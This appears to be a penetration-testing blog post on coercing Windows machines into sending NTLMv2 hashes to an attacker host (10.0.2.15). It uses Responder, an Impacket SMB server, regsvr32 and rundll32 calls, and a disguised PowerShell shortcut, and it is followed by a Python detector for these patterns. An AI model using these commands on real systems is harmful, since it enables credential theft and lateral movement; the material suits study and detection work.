So today I just wanted to write a simple post explaining methods of capturing hashes (NTLM, NTLMv2, etc.). Let's say we have access to a victim machine and are trying to escalate our privileges, maintain persistence or execute commands. Various things can be done from here, but I won't dive too deep into what can be done; there are some very good posts about that written already. I am just going to show various techniques for capturing these pieces of information, either to use directly or to crack and recover a plaintext password from.
These examples will be run from a reverse shell, as we don't always have a nice GUI to use when we are in an engagement, or it simply isn't available for whatever reason. I will try my best to work with this situation, as I would love to be capable of running many techniques from just a simple shell [don't know why, but I like it more that way].
In the first example I will use an awesome tool called "Responder", a great tool for poisoning LLMNR and NBT-NS responses. This works great when a user mistypes a network share name: when Windows can't resolve the name via DNS it falls back to LLMNR and NBT-NS, and from here Responder answers the request, telling the user "Yes, I am [Insert Name Here]", and captures the NTLMv2 hash used for authentication. Here is a sample of how to capture it with your shell.
Use the "dir" command and try to list a non-existent share; from here Responder will start its magic by responding to that non-existent share.
With a great tool from Impacket we can create a fast SMB server to share files and to exfiltrate any loot that we may find on the network, but we are focused on grabbing hashes, so how would this work? Easy: we set up the SMB server and then simply connect to it to capture the hash.
In this example we also need to use the IP address of the attacking machine together with the share name that we are trying to access.
dir \\<IP ADDR>\Fake-SMB
The user will receive an error like this if they ever try to access the share. You have to make sure to enable SMB2 support (the -smb2support option) to avoid compatibility issues.
With this tool (regsvr32.exe) we can try to call a non-existent file from our attacking machine; it will try to communicate with it, and from here as well we will capture the NTLMv2 hash.
regsvr32.exe /s /u /i://10.0.2.15/@NotExist scrobj.dll
What about shortcut links? Make our target think that they are visiting a website when they have actually reached out to our machine. Well, since we have a PowerShell shell, we can create a simple LNK file to do this. We can use the following:
# Create the shortcut through the WScript.Shell COM object
$WshShell = New-Object -ComObject WScript.Shell
$shortcut = $WshShell.CreateShortcut("hash.url")
# Point the shortcut at a UNC path on the attacking machine
$shortcut.TargetPath = "file://10.0.2.15/@NOTHERE"
$shortcut.Save()
And finally we can just call it from PowerShell or wait for our target to execute it; we might want to do some social engineering here and make it look like we replaced a shortcut of their own.
Yes, as mentioned here, we can use curl to capture NTLM hashes as well. You mostly have to think about applications that make network connections; as curl is now integrated into Windows CMD and PowerShell, it's as simple as typing:
These are just a few techniques and methods which we can utilize from our trusty old ncat shell to grab some NTLMv2 hashes. The good thing is that we don't even need to escalate privileges: we can just leave these files and wait for an administrator to click them [it sometimes happens!] and capture those hashes as well. From here we know how to proceed: we can use any password cracker [John, Hashcat, etc.] to crack these hashes. There are more techniques that are very useful, even for catching a shell [NTLM relay], but we won't dive into that; I just wanted to demonstrate a few techniques for capturing hashes. Be wary, it can be as simple as
rundll32.exe \\10.0.2.15\NOTHERE.txt,entrypoint . [Another technique not explained] but you get the idea: these binaries make network connections, not just to execute remote files or download them, and we can capture hashes that way as well!
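As an added, defender-side example that is not part of the original post: a small Python detector for the coercion patterns described above (LOLBins such as regsvr32, rundll32 and curl opening SMB to an unexpected host, SMB leaving the network, and LLMNR fallback queries), run over constructed Sysmon-style Event ID 3 records. The internal ranges, the allow-listed file server and the flattened event format are assumptions made for this example.

```python
import re
from ipaddress import ip_address, ip_network
# Constructed sample records in the shape of Sysmon Event ID 3 (network connection)
# fields, one event per line. These are made up for this example, not captured data.
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\System32\\regsvr32.exe DestinationIp=10.0.2.15 DestinationPort=445",
    "Image=C:\\Windows\\System32\\rundll32.exe DestinationIp=10.0.2.15 DestinationPort=445",
    "Image=C:\\Windows\\explorer.exe DestinationIp=10.0.0.5 DestinationPort=445",
    "Image=C:\\Windows\\System32\\svchost.exe DestinationIp=224.0.0.252 DestinationPort=5355",
    "Image=C:\\Windows\\System32\\curl.exe DestinationIp=203.0.113.9 DestinationPort=445",
    "Image=C:\\Program Files\\Mozilla Firefox\\firefox.exe DestinationIp=203.0.113.9 DestinationPort=443",
]
# Assumed environment facts: internal address ranges and the sanctioned file servers.
INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("192.168.0.0/16")]
KNOWN_FILE_SERVERS = {"10.0.0.5"}
# Binaries the post shows coercing an SMB authentication. explorer.exe is left out
# because ordinary share browsing would bury the alert in noise.
LOLBIN_SMB_CLIENTS = {"regsvr32.exe", "rundll32.exe", "curl.exe", "powershell.exe", "cmd.exe"}
SMB_PORTS = {445, 139}
LLMNR_PORT = 5355  # multicast name-resolution fallback that Responder answers

FIELD = re.compile(r"(\w+)=(.*?)(?= \w+=|$)")

def parse_event(line):
    """Split 'Key=value Key=value' into a dict; values may contain spaces."""
    return dict(FIELD.findall(line))

def classify(event):
    """Return an alert label for one parsed event, or None if nothing fires."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    dst, port = ip_address(event["DestinationIp"]), int(event["DestinationPort"])
    if port in SMB_PORTS:
        if not any(dst in net for net in INTERNAL_NETS):
            return "smb-to-internet"          # SMB should never leave the perimeter
        if image in LOLBIN_SMB_CLIENTS and str(dst) not in KNOWN_FILE_SERVERS:
            return "lolbin-smb-unknown-host"  # regsvr32 /i://host, rundll32 \\host\..., etc.
    if port == LLMNR_PORT:
        return "llmnr-query"                  # name lookup fell back to LLMNR (poisonable)
    return None

def scan(lines):
    """Return (label, image basename, destination) for every event that fires."""
    hits = []
    for line in lines:
        event = parse_event(line)
        label = classify(event)
        if label:
            hits.append((label, event["Image"].rsplit("\\", 1)[-1], event["DestinationIp"]))
    return hits
```

Running scan(SAMPLE_EVENTS) flags the regsvr32 and rundll32 connections to the unknown host, the LLMNR query and the curl SMB connection leaving the network, while explorer.exe reaching the known file server and the browser's HTTPS traffic stay quiet.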